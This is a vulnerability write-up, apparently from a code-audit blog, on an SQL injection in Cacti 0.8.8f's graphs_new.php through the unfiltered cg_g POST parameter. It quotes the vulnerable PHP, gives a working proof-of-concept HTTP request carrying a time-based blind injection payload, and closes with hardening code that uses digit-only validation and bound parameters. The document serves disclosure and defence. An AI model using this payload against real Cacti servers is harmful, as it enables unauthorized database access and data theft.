
Cacti 0.8.8f SQL Injection Vulnerability

Code audit | 表哥C | 3156 views | 0 comments


Vulnerability analysis

graphs_new.php

function form_save() {
    if (isset($_POST["save_component_graph"])) {
        /* summarize the 'create graph from host template/snmp index' stuff into an array */
        while (list($var, $val) = each($_POST)) {
            if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;

            //cg_g is not filtered

            }elseif (preg_match('/^cg_g$/', $var)) {
                if ($_POST["cg_g"] > 0) {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;  // the raw POST value becomes an array key

                }
            }elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        }

        if (isset($selected_graphs)) {
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs); // calls the vulnerable function
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }

    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}


function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) { // iterate over the array
        while (list($form_id1, $form_array2) = each($form_array)) { // keep iterating; the array keys are pulled out as form_id1 / form_id2
            if ($form_type == "cg") {
                $graph_template_id = $form_id1; // the attacker-controlled key is assigned to the template id
                //sql injection in graph_template_id
                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", ""); // interpolated straight into the query
            }elseif ($form_type == "sg") {
                while (list($form_id2, $form_array3) = each($form_array2)) {
                    /* ================= input validation ================= */
                    input_validate_input_number($snmp_query_id);
                    /* ==================================================== */

                    $snmp_query_id = $form_id1;
                    $snmp_query_graph_id = $form_id2;

                    // ... the remainder of host_new_graphs() is not included in the original excerpt

POC:

POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Content-Type: application/x-www-form-urlencoded
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

From:https://packetstormsecurity.com/files/135191/cacti088fgraphs-sql.txt
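As an added example (not Cacti's own code), here is how the cg_g branch above can be hardened: reject anything that is not a plain positive integer before it is used as an array key, and bind the id in the query instead of interpolating it. The function names and the `$pdo` connection are assumptions; `graph_templates` is the table named in the vulnerable query.

```php
<?php
// Added example, not Cacti code: hardened handling of the cg_g parameter.
// $pdo is an assumed PDO connection to the Cacti database.

function graph_template_id_from_post(array $post): ?int {
    // The original check is `$_POST["cg_g"] > 0`, a loose comparison that a
    // leading-numeric string such as the PoC payload also passes.
    // A strict digits-only whitelist closes that gap.
    if (!isset($post['cg_g']) || !is_string($post['cg_g'])) {
        return null;
    }
    if (!preg_match('/^[1-9]\d*$/', $post['cg_g'])) {
        return null; // "033926697 xor (select ...)" is rejected here
    }
    return (int) $post['cg_g'];
}

function graph_template_name(PDO $pdo, int $graph_template_id): ?string {
    // Parameter binding: the id never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT name FROM graph_templates WHERE id = :id');
    $stmt->bindValue(':id', $graph_template_id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

// Constructed sample inputs: the PoC payload from above and a well-formed id.
var_dump(graph_template_id_from_post(
    ['cg_g' => '033926697 xor (select(0)from(select sleep(5))v)']
)); // NULL
var_dump(graph_template_id_from_post(['cg_g' => '7'])); // int(7)
```

Only an id that survives `graph_template_id_from_post()` should be stored in `$selected_graphs["cg"]`, so the key that later reaches `host_new_graphs()` is always an integer.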
